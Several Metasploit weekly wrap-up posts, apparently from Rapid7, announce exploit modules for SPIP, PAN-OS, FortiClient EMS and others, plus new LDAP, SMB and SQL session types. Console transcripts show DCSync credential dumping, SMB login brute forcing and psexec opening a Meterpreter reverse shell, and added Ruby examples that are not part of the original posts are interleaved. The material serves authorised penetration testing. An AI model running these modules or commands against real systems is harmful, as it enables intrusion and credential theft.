SPIP Modules

Metasploit Weekly Wrap-Up 09/13/2024

This week brings more modules targeting the SPIP publishing platform. SPIP has gained some attention from Metasploit community contributors recently and has inspired some PHP payload and encoder improvements.

New module content (2)

SPIP BigUp Plugin Unauthenticated RCE

Authors: Julien Voisin, Laluka, Valentin Lobstein, and Vozec
Type: Exploit
Pull request: #19444 contributed by Chocapikk
Path: multi/http/spip_bigup_unauth_rce
AttackerKB reference: CVE-2024-8517

Description: This adds an exploit module for CVE-2024-8517, an unauthenticated RCE able to execute arbitrary PHP code.

SPIP connect Parameter PHP Injection

Authors: Arnaud Pachot, Davy Douhine, Frederic Cikala, and Valentin Lobstein
Type: Exploit
Pull request: #19432 contributed by Chocapikk
Path: multi/http/spip_connect_exec
CVE reference: BID-54292

Description: Refactor SPIP Modules for Windows Compatibility and Incorporating SPIP Mixin.

Enhancements and features (3)

  • #19330 from heyder - The start_service method in the http_server.rb library now allows users to specify their SSL preferences directly through the opts parameter. If the ssl option is not provided in opts, it will default to the value in datastore["SSL"].
  • #19352 from zgoldman-r7 - Adjusts the metadata for the ldap login scanner, adding defaults and adjusting the service and protocol values.
  • #19432 from Chocapikk - Refactor SPIP Modules for Windows Compatibility and Incorporating SPIP Mixin.

Bugs fixed (1)

  • #19439 from bcoles - This explicitly defines x86 and x64 as supported architectures for the bypassuac_comhijack module. Prior to this change there were no defined architectures and if you tried to use an x64 based payload the module would fail.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.


LDAP Authentication Improvements

Metasploit Wrap-Up 05/17/2024

This week, in Metasploit v6.4.9, the team has added multiple improvements for LDAP-related attacks. Two improvements relating to authentication are the new support for Signing and Channel Binding. Microsoft has been making changes to harden communications to Domain Controllers. Organizations are adopting these policies, which leave LDAP tools without the necessary features unable to operate. The intention behind these changes is to protect communications with Domain Controllers from relay attacks. There are, however, plenty of scenarios in which users may want to authenticate to a domain controller directly with known credentials to perform a variety of tasks.

The new improvements allow Metasploit users to authenticate via either NTLM or Kerberos to LDAP servers with these hardening settings in place. Signing is performed opportunistically by default (LDAP::Signing=auto); it can be disabled entirely by setting LDAP::Signing to disabled, or made mandatory by setting it to required. Note that setting it to required will raise exceptions for configurations that are incompatible with signing, e.g. connecting over SSL (LDAPS) or using plaintext / simple authentication. At this time channel binding is automatically enabled and cannot be disabled in the same way. When connecting over SSL and authenticating with either NTLM or Kerberos, the binding information is provided to the server.

For users that are unfamiliar with the semi-recent authentication configuration changes introduced in Metasploit v6.3, LDAP modules have an LDAP::Auth option that can be set to one of auto, ntlm, kerberos, schannel, or plaintext.
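The following is an added illustration, not Metasploit's own code: a small Ruby model of how the LDAP::Signing and LDAP::Auth values described above combine, including the combinations the post says are incompatible with a required signing setting. The option values come from the post; the method name, the error class and the assumption that LDAP::Auth=auto falls back to NTLM are mine.

```ruby
# Added example, not Metasploit code: models the interaction of the
# LDAP::Signing and LDAP::Auth options described in the wrap-up.
SIGNING_MODES = %w[auto disabled required].freeze
AUTH_MODES    = %w[auto ntlm kerberos schannel plaintext].freeze
# Only NTLM and Kerberos negotiate a session key that can sign traffic or
# carry channel-binding data; schannel and plaintext cannot.
SIGNABLE_AUTH = %w[ntlm kerberos].freeze

class LdapSecurityError < StandardError; end

# Returns the protections a connection would end up with.
#   ssl:     true when connecting over LDAPS
#   auth:    the LDAP::Auth value
#   signing: the LDAP::Signing value
def ldap_protections(ssl:, auth: 'auto', signing: 'auto')
  raise ArgumentError, "unknown LDAP::Auth value #{auth}" unless AUTH_MODES.include?(auth)
  raise ArgumentError, "unknown LDAP::Signing value #{signing}" unless SIGNING_MODES.include?(signing)

  # assumption for this model: 'auto' picks NTLM when no Kerberos details are given
  effective_auth = auth == 'auto' ? 'ntlm' : auth
  # signing is only possible without TLS and with a signing-capable mechanism
  can_sign = !ssl && SIGNABLE_AUTH.include?(effective_auth)

  sign =
    case signing
    when 'disabled' then false
    when 'auto'     then can_sign   # opportunistic: sign whenever it is possible
    when 'required'
      unless can_sign
        reason = ssl ? 'LDAPS (TLS) connections' : "#{effective_auth} authentication"
        raise LdapSecurityError, "LDAP::Signing=required is incompatible with #{reason}"
      end
      true
    end

  # channel binding is always on; it is actually sent when a TLS channel exists
  # and the mechanism can carry the binding information
  channel_binding = ssl && SIGNABLE_AUTH.include?(effective_auth)

  { auth: effective_auth, sign: sign, channel_binding: channel_binding }
end

if __FILE__ == $PROGRAM_NAME
  [[false, 'ntlm', 'auto'], [true, 'kerberos', 'auto'], [false, 'plaintext', 'auto']].each do |ssl, auth, signing|
    puts "ssl=#{ssl} auth=#{auth} signing=#{signing} -> #{ldap_protections(ssl: ssl, auth: auth, signing: signing)}"
  end
  begin
    ldap_protections(ssl: true, auth: 'ntlm', signing: 'required')
  rescue LdapSecurityError => e
    puts "rejected: #{e.message}"
  end
end
```

The useful property to notice is that `auto` never produces a silently unprotected connection when protection was possible, while `required` turns the impossible cases (LDAPS, simple bind) into an error instead of an unsigned session.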

LDAP Session

In addition to the new LDAP authentication improvements, this week Metasploit added its latest session type: LDAP sessions. Metasploit v6.4 added new protocol-based sessions that allow modules to be run against persistent connections for a variety of services, including SMB, MSSQL and MySQL. Once the feature is enabled by running features set ldap_session_type true, users can open sessions with the auxiliary/scanner/ldap/ldap_login module and the CreateSession option. These new sessions allow users to authenticate once and interact with the connection, running queries or modules such as:

By interacting with the session, the query command becomes available to run queries interactively. It has a few options allowing the scope, attributes and filter to be set.

LDAP (192.0.2.197) > query -h
Usage: query -f <filter string> -a <attributes>

Run the query against the session.

OPTIONS:

    -a, --attributes      Comma separated list of attributes for the query
    -b, --base-dn         Base dn for the query
    -f, --filter          Filter string for the query (default: (objectclass=*))
    -h, --help            Help menu
    -o, --output-format   Output format: `table`, `csv` or `json` (default: table)
    -s, --scope           Scope for the query: `base`, `single`, `whole` (default: whole)

As an example, basic information about the domain can be queried:

LDAP (192.0.2.197) > query -a ms-DS-MachineAccountQuota,objectSID,name -f '(objectClass=domain)'
DC=labs1collabu0,DC=local
=========================

 Name                       Attributes
 ----                       ----------
 ms-ds-machineaccountquota  10
 name                       labs1collabu0
 objectsid                  S-1-5-21-795503-3050334394-3644400624

New module content (2)

Windows Registry Security Descriptor Utility

Author: Christophe De La Fuente
Type: Auxiliary
Pull request: #19115 contributed by cdelafuente-r7
Path: admin/registry_security_descriptor

Description: This adds a module to read and write the security descriptor of Windows registry keys.

Kemp LoadMaster Local sudo privilege escalation

Authors: Dave Yesland with Rhino Security Labs and bwatters-r7
Type: Exploit
Pull request: #19100 contributed by bwatters-r7
Path: linux/local/progress_kemp_loadmaster_sudo_privesc_2024

Description: This adds a privilege escalation exploit module for LoadMaster that abuses the configuration of the sudo command combined with weak file system permissions. There is no CVE for this vulnerability.

Enhancements and features (2)

  • #19058 from dwelch-r7 - This adds an LDAP session type allowing users and modules to interact directly with LDAP servers without uploading a payload.
  • #19132 from zeroSteiner - Add channel binding information to Metasploit's NTLM and Kerberos authentication for the LDAP protocol. This enables users to authenticate to domain controllers where the hardened security configuration setting is in place.
  • #19172 from cgranleese-r7 - Updates the debug command to export the currently enabled user features.

Bugs fixed (1)

  • #19183 from adfoster-r7 - Fix windows platform detection bug when running on a UCRT compiled environment.


Rancher Modules

Metasploit Weekly Wrap-Up 04/26/24

This week, Metasploit community member h00die added the second of two modules targeting Rancher instances. These modules each leak sensitive information from vulnerable instances of the application which is intended to manage Kubernetes clusters. These are a great addition to Metasploit’s coverage for testing Kubernetes environments.

PAN-OS RCE

Metasploit also released an exploit for the unauthenticated RCE in PAN-OS that has been receiving a lot of attention recently. This vulnerability is an unauthenticated file creation that can be leveraged to trigger the execution of remote commands. See Rapid7’s analysis on AttackerKB for an in depth explanation of the root cause.

New module content (8)

Rancher Authenticated API Credential Exposure

Authors: Florian Struck, Marco Stuurman, and h00die
Type: Auxiliary
Pull request: #18956 contributed by h00die
Path: gather/rancher_authenticated_api_cred_exposure
AttackerKB reference: CVE-2021-36782

Description: This adds an exploit for CVE-2021-36782, a vulnerability which can be leveraged by an authenticated attacker to leak API credentials from an affected Rancher instance.

Gitlab Version Scanner

Author: Julien (jvoisin) Voisin
Type: Auxiliary
Pull request: #18723 contributed by jvoisin
Path: scanner/http/gitlab_version

Description: A web page exists that can be reached without authentication and that contains a hash which can be used to determine the approximate version of GitLab running on the endpoint. This PR enhances our current GitLab fingerprinting capabilities to include the aforementioned technique.

Apache Solr Backup/Restore APIs RCE

Authors: jheysel-r7 and l3yx
Type: Exploit
Pull request: #19046 contributed by jheysel-r7
Path: linux/http/apache_solr_backup_restore
AttackerKB reference: CVE-2023-50386

Description: Adds the apache_solr_backup_restore module, which takes advantage of an Unrestricted Upload of File with Dangerous Type vulnerability, allowing the user to gain a session on an Apache Solr instance for remote code execution.

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

Authors: remmons-r7 and sfewer-r7
Type: Exploit
Pull request: #19101 contributed by remmons-r7
Path: linux/http/panos_telemetry_cmd_exec
AttackerKB reference: CVE-2024-3400

Description: This adds an exploit module for https://security.paloaltonetworks.com/CVE-2024-3400, affecting PAN-OS GlobalProtect Gateway and GlobalProtect Portal deployments with the default telemetry service enabled.

GitLens Git Local Configuration Exec

Authors: Paul Gerste and h00die
Type: Exploit
Pull request: #18997 contributed by h00die
Path: multi/fileformat/gitlens_local_config_exec
AttackerKB reference: CVE-2023-46944

Description: This adds a FileFormat exploit for VSCode. The VSCode extension GitLens by GitKraken before v.14.0.0 allows an untrusted workspace to execute git commands. A repo may include its own .git folder including a malicious config file to execute arbitrary code.

Code Reviewer

Author: h00die
Type: Exploit
Pull request: #18996 contributed by h00die
Path: multi/fileformat/visual_studio_vsix_exec

Description: This adds a new exploit module that creates a malicious VS / VSCode extension file.

Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability

Authors: h00die-gr3y h00die.gr3y@gmail.com and usd Herolab
Type: Exploit
Pull request: #19005 contributed by h00die-gr3y
Path: multi/http/gambio_unauth_rce_cve_2024_23759
AttackerKB reference: CVE-2024-23759

Description: This adds a module for a Remote Code Execution vulnerability in Gambio Online Webshop version 4.9.2.0 and lower that allows remote attackers to run arbitrary commands via an unauthenticated HTTP POST request.

FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE

Authors: James Horseman, Spencer McIntyre, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #19082 contributed by jheysel-r7
Path: windows/http/forticlient_ems_fctid_sqli
AttackerKB reference: CVE-2023-48788

Description: Adds the windows/http/forticlient_ems_fctid_sqli module, which takes advantage of a SQL injection vulnerability in FortiNet FortiClient EMS.

Enhancements and features (11)

  • #17294 from adfoster-r7 - This adds a new EVENT_DEPENDENT value for module reliability metadata.
  • #18723 from jvoisin - A web page exists that can be reached without authentication and that contains a hash which can be used to determine the approximate version of GitLab running on the endpoint. This PR enhances our current GitLab fingerprinting capabilities to include the aforementioned technique.
  • #18914 from dotslashsuperstar - This PR adds functionality so that CVE and URL references will be imported from an OpenVAS XML report by default. DNF-CERT and CERT-BUND references can also be collected by sending additional flags to the db_import command.
  • #19054 from zgoldman-r7 - Adds NText column parsing to MSSQL modules.
  • #19066 from sjanusz-r7 - Adds automated tests for multiple SMB modules.
  • #19078 from dwelch-r7 - Fixes a crash in the modules/auxiliary/gather/ldap_query.rb module when running queries from a file.
  • #19080 from cgranleese-r7 - Adds architecture and platform detection for PostgreSQL sessions.
  • #19086 from nrathaus - Update Metasploit's RPC to expose module's default_options metadata.
  • #19105 from zgoldman-r7 - Not written.
  • #19112 from zgoldman-r7 - Adds architecture and platform detection for MSSQL sessions.
  • #19122 from h00die - Adds additional reliability metadata to exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.

Bugs fixed (6)

  • #19079 from nrathaus - Fixes an issue where the password_spray module option was being ignored.
  • #19089 from adfoster-r7 - This PR fixes a bug where a user might get an unexpected NoMethodError running the linux/local/exim4_deliver_message_priv_esc module.
  • #19111 from zeroSteiner - This PR fixes a bug where a user can specify an invalid payload architecture for a given exploit target. Previously, it was not possible to tab-complete an invalid payload, but this enforces the architecture limitations with a run-time exception before sending the exploit.
  • #19113 from adfoster-r7 - Fixes a regression that caused Metasploit to leak memory, and sometimes crash.
  • #19114 from zeroSteiner - This PR fixes several instances where we pass nil values rather than the types expected, causing crashes and stack traces in LDAP-related modules.
  • #19129 from nrathaus - This fixes a bug where the notes command included an example which contained a flag that was not supported.

Documentation added (1)

  • #19088 from adfoster-r7 - This PR adds documentation for running and writing Metasploit's unit tests.

You can always find more documentation on our docsite at docs.metasploit.com.


Metasploit Framework 6.4 Released

Today, Metasploit is pleased to announce the release of Metasploit Framework 6.4. It has been just over a year since the release of version 6.3 and the team has added many new features and improvements since then.

For news reporters, please reach out to press@rapid7.com.

Kerberos Improvements

Metasploit 6.3 included initial support for Kerberos authentication within Metasploit and was one of the larger features in the release. Since then, Metasploit has continued to make Kerberos-related improvements, adding capabilities that didn’t make it into the 6.3 cut.

  • The auxiliary/admin/kerberos/forge_ticket module was updated with:
    • Support for the diamond and sapphire techniques in addition to the original golden and silver techniques.
    • The additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
  • We added the post/windows/manage/kerberos_tickets post module, which allows users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
  • The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Example of running the gather/windows_secrets_dump module with Kerberos authentication and the DOMAIN action:

msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN
[*] Running module against 192.168.123.133

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Opening Service Control Manager
…
[*] 192.168.123.133:445 - Using cached credential for krbtgt/DEMO.LOCAL@DEMO.LOCAL vagrant@DEMO.LOCAL
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Bound to DRSR
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local
# SID's:
Administrator: S-1-5-21-1242350107-3695253863-3717863007-500
…

# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::
…

# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
…

# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6
…

[*] 192.168.123.133:445 - Cleaning up...
[*] Auxiliary module execution completed
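As an added example (not part of the post and not Metasploit code), the Ruby below parses the hashdump-style sections printed by windows_secrets_dump above and runs a small audit over the account attributes carried in the "Full pwdump format" lines, which is the part of this output a defender reviewing a DCSync result actually cares about. The sample text is constructed: the Administrator lines are the ones shown in the post, and the svc_backup account, its RID and its hashes are invented for the illustration.

```ruby
# Added example, not Metasploit code: parse the NTLM / full pwdump / Kerberos
# sections of a windows_secrets_dump DOMAIN run and audit the account flags.

# Constructed sample: the Administrator lines come from the post, svc_backup is invented.
SAMPLE_DUMP = <<~DUMP
  # NTLM hashes:
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::
  svc_backup:1108:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

  # Full pwdump format:
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
  svc_backup:1108:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=true,PasswordLastChanged=201801010900,LastLogonTimestamp=202403181200,IsAdministrator=true,IsDomainAdmin=false,IsEnterpriseAdmin=false::

  # Kerberos keys:
  Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6
DUMP

EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze # well-known NT hash of an empty password

# "k=v,k=v" attribute list -> hash with true/false converted to booleans
def parse_attrs(str)
  str.split(',').each_with_object({}) do |kv, h|
    k, v = kv.split('=', 2)
    h[k] = case v when 'true' then true when 'false' then false else v end
  end
end

# Returns { ntlm: [...], accounts: [...], kerberos: [...] }; section headers ("# ...")
# switch the parser between the three line formats.
def parse_secrets_dump(text)
  out = { ntlm: [], accounts: [], kerberos: [] }
  section = nil
  text.each_line do |raw|
    line = raw.strip
    next if line.empty?
    if line.start_with?('#')
      section = case line
                when /NTLM hashes/i   then :ntlm
                when /Full pwdump/i   then :accounts
                when /Kerberos keys/i then :kerberos
                end
      next
    end
    case section
    when :ntlm      # user:rid:lm:nt:::
      user, rid, lm, nt = line.split(':', -1)
      out[:ntlm] << { user: user, rid: rid.to_i, lm: lm, nt: nt }
    when :accounts  # user:rid:lm:nt:attr=val,...::
      user, rid, lm, nt, attrs = line.split(':', -1)
      out[:accounts] << { user: user, rid: rid.to_i, lm: lm, nt: nt, attrs: parse_attrs(attrs) }
    when :kerberos  # user:etype:hexkey
      user, etype, key = line.split(':', 3)
      out[:kerberos] << { user: user, etype: etype, key: key }
    end
  end
  out
end

# Findings a defender would act on after reviewing such a dump.
def audit_accounts(accounts)
  accounts.flat_map do |acct|
    a = acct[:attrs]
    privileged = a['IsDomainAdmin'] || a['IsEnterpriseAdmin'] || a['IsAdministrator']
    findings = []
    findings << 'privileged account with PasswordNeverExpires' if privileged && a['PasswordNeverExpires']
    findings << 'empty NT hash (blank password)' if acct[:nt] == EMPTY_NT
    findings << 'PasswordNotRequired set' if a['PasswordNotRequired']
    findings << 'privileged account has never logged on' if privileged && a['LastLogonTimestamp'] == 'never'
    findings.map { |f| "#{acct[:user]} (RID #{acct[:rid]}): #{f}" }
  end
end

if __FILE__ == $PROGRAM_NAME
  parsed = parse_secrets_dump(SAMPLE_DUMP)
  puts "#{parsed[:ntlm].size} NTLM entries, #{parsed[:kerberos].size} Kerberos keys"
  audit_accounts(parsed[:accounts]).each { |f| puts "[!] #{f}" }
end
```

The attribute block is what makes the full pwdump format worth parsing over the plain NTLM lines: the flags let an audit single out privileged accounts whose password never expires or that have never logged on, without any further directory queries.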

DNS Configuration

One of the major benefits of using the Metasploit framework is the integrated way to pivot connections over established sessions without needing to set up proxies. This means that Metasploit often handles DNS queries for various services as modules are run. Over the past year, Metasploit has made improvements to how it handles its own DNS queries to ensure they are not leaked unintentionally.

Users can configure how hostnames should be resolved. This is particularly useful in pivoting scenarios to ensure that the requests for a specific domain (or all domains) are resolved using a configured nameserver optionally contacted via an established session. As an example, users can configure Metasploit to ensure that their DNS queries for internal resources are originating from a compromised host and not themselves.

Examples of manipulating the DNS configuration:

dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1
dns add --rule honeypot.lab.lan --index 2 black-hole
dns add-static example2.lab.lan 192.0.2.201
dns add --index 1 --rule * static system 192.0.2.1

Viewing the current configuration:

msf6 > dns print
Default search domain: N/A
Default search list:
  * tor.example.com
  * localdomain
Current cache size:    0

Resolver rule entries
=====================

   #  Rule              Resolver    Comm channel
   -  ----              --------    ------------
   1  *.lab.lan         192.0.2.1   Session 1
   2  honeypot.lab.lan  black-hole  N/A
   3  *
   .    \_              static      N/A
   .    \_              10.4.5.45
   .    \_              10.3.20.98


Static hostnames
================

   Hostname          IPv4 Address  IPv6 Address
   --------          ------------  ------------
   example.lab.lan   192.0.2.200
   example2.lab.lan  192.0.2.201
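To make the rule semantics shown above concrete, here is an added Ruby model of the resolver rule table; it is an illustration written for this page, not Metasploit's own implementation. Wildcard rules, numbered ordering with --index, the static, system and black-hole resolvers and the per-rule comm channel all come from the post. The assumptions are mine: rules are evaluated in index order with the first match winning, the resolvers of a rule are tried in the order listed, and static hostnames are consulted only by rules that name the static resolver. The class and method names are invented.

```ruby
# Added example, not Metasploit code: a model of the dns rule table and of
# the path a query for a given hostname would take through it.
class DnsConfigModel
  Rule = Struct.new(:pattern, :resolvers, :session)

  attr_reader :rules

  def initialize
    @rules  = []   # ordered; position + 1 is the rule's index
    @static = {}   # hostname => IPv4 string
  end

  # dns add-static <hostname> <ip>
  def add_static(host, ip)
    @static[host.downcase] = ip
  end

  # dns add [--index N] --rule <pattern> [--session S] <resolver> [<resolver> ...]
  # A rule inserted at --index N pushes the rules that follow it down by one.
  def add(rule:, resolvers:, index: nil, session: nil)
    entry = Rule.new(rule.downcase, resolvers, session)
    index ? @rules.insert(index - 1, entry) : @rules << entry
  end

  # Describe how +host+ would be resolved: which resolver handles it and over
  # which comm channel, plus the answer when it can be produced locally.
  def resolve(host)
    host = host.downcase
    rule = @rules.find { |r| File.fnmatch?(r.pattern, host, File::FNM_CASEFOLD) }
    return { resolver: nil, channel: 'N/A', answer: nil } unless rule

    rule.resolvers.each do |res|
      case res
      when 'black-hole'
        return { resolver: 'black-hole', channel: 'N/A', answer: nil }     # query is dropped
      when 'static'
        ip = @static[host]
        return { resolver: 'static', channel: 'N/A', answer: ip } if ip     # otherwise try the next resolver
      when 'system'
        return { resolver: 'system', channel: 'N/A', answer: nil }         # host OS resolver
      else
        # an upstream nameserver; the query leaves via the rule's session when one is set
        channel = rule.session ? "Session #{rule.session}" : 'N/A'
        return { resolver: res, channel: channel, answer: nil }
      end
    end
    { resolver: nil, channel: 'N/A', answer: nil }
  end
end

# A table equivalent to the post's example, with the honeypot rule placed at
# index 1 so the more specific rule is evaluated before the *.lab.lan wildcard.
def example_dns_config
  cfg = DnsConfigModel.new
  cfg.add(rule: '*.lab.lan', resolvers: ['192.0.2.1'], session: 1)
  cfg.add(rule: 'honeypot.lab.lan', resolvers: ['black-hole'], index: 1)
  cfg.add(rule: '*', resolvers: %w[static system])
  cfg.add_static('fileserver.corp.example', '192.0.2.200')   # constructed static entry
  cfg
end

if __FILE__ == $PROGRAM_NAME
  cfg = example_dns_config
  %w[dc01.lab.lan honeypot.lab.lan fileserver.corp.example www.example.org].each do |h|
    puts "#{h.ljust(24)} #{cfg.resolve(h)}"
  end
end
```

The point of the walk-through is the leak-prevention property described above: with the wildcard rule first, any *.lab.lan lookup is routed through session 1 rather than the operator's own resolver, and a catch-all rule without a session still has to be explicit about where everything else goes.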

New session types

Metasploit 6.4 adds support for new PostgreSQL, MSSQL, MySQL and SMB session types. The SQL session types allow interactive queries with a remote database instance while the new SMB session will let you interact with a share, navigate directories, upload, and download files. All of these new session types can also be used with relevant auxiliary modules, meaning you can get a single SMB or SQL session and run multiple modules against the session without needing to reconnect each time.

New SMB Session Type Examples

You can open a new SMB session by setting the CreateSession option:

msf6 > use scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant CreateSession=true

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: '.\vagrant:vagrant' Administrator
[!] 192.168.123.133:445   - No active DB -- Credential data will not be saved!
[*] SMB session 2 opened (192.168.123.1:52253 -> 192.168.123.133:445) at 2024-03-19 12:07:15 +0000
[*] 192.168.123.133:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > 

The session will open as a new SMB session type:

msf6 auxiliary(scanner/smb/smb_login) > sessions
Active sessions
===============
  Id  Name  Type  Information                        Connection
  --  ----  ----  -----------                        ----------
  1         smb   SMB vagrant @ 192.168.123.133:445  192.168.123.1:53541 -> 192.168.123.133:445 (192.168.123.133)
msf6 auxiliary(scanner/smb/smb_login) >

Interacting with the session allows for direct file manipulation of the remote host including upload and download support:

msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
[*] Starting interaction with 1…
SMB (192.168.123.133) > ls
[-] No active share selected. Use the shares command to view available shares, and shares -i <id> to interact with one
SMB (192.168.123.133) > shares
Shares
======
    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  foo       DISK
    3  IPC$      IPC|SPECIAL   Remote IPC
    4  NETLOGON  DISK          Logon server share
    5  SYSVOL    DISK          Logon server share

SMB (192.168.123.133) > shares -i foo
[+] Successfully connected to foo
SMB (192.168.123.136\foo) > ls
Shares
======
    #  Type  Name                 Created                    Accessed                   Written                    Changed                    Size
    -  ----  ----                 -------                    --------                   -------                    -------                    ----
    0  DIR   .                    2023-09-15T18:56:07+01:00  2023-10-10T12:39:26+01:00  2023-10-10T12:39:26+01:00  2023-10-10T12:39:26+01:00
    1  DIR   ..                   2021-05-08T09:06:51+01:00  2024-02-01T13:11:41+00:00  2024-02-01T13:11:41+00:00  2024-02-01T13:11:41+00:00
    2  FILE  passwords.docx       2023-10-10T12:34:57+01:00  2023-10-10T12:38:53+01:00  2023-10-10T12:38:53+01:00  2023-10-10T12:38:53+01:00  1403

The new session type supports running existing modules against the session, such as Metasploit's secrets dump module, and the session stays alive afterwards:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > use auxiliary/gather/windows_secrets_dump
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(gather/windows_secrets_dump) > run session=-1

Or you can run Metasploit’s PsExec support with the SMB session to open a Meterpreter session:

msf6 > use windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > run session=-1
…
[*] Sending stage (176198 bytes) to 10.4.227.91
[*] Meterpreter session 2 opened (10.4.227.91:4444 -> 10.4.227.91:50319) at 2024-03-19 16:41:45 +0000
meterpreter >

Kerberos authentication is also supported:

msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local createsession=true 

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445   - 192.168.123.133:445   - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_903639.bin
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445   - 192.168.123.133:445   - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_231110.bin
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid delegation TGS-Response
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: 'demo.local\vagrant:vagrant' Administrator
[*] SMB session 3 opened (192.168.123.1:50336 -> 192.168.123.133:445) at 2024-03-19 16:43:01 +0000
[*] 192.168.123.133:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

New SQL Session Types Examples

Metasploit 6.4 has added support for PostgreSQL, MSSQL and MySQL session types. You can open a new SQL session by setting the CreateSession option:

msf6 > use auxiliary/scanner/mssql_login
msf6 auxiliary(scanner/smb/smb_login) > run CreateSession=true RPORT=1433 RHOSTS=192.168.2.242 USERNAME=user PASSWORD=password

Which will create a new SQL session:

[*] 192.168.2.242:1433    - 192.168.2.242:1433 - MSSQL - Starting authentication scanner.
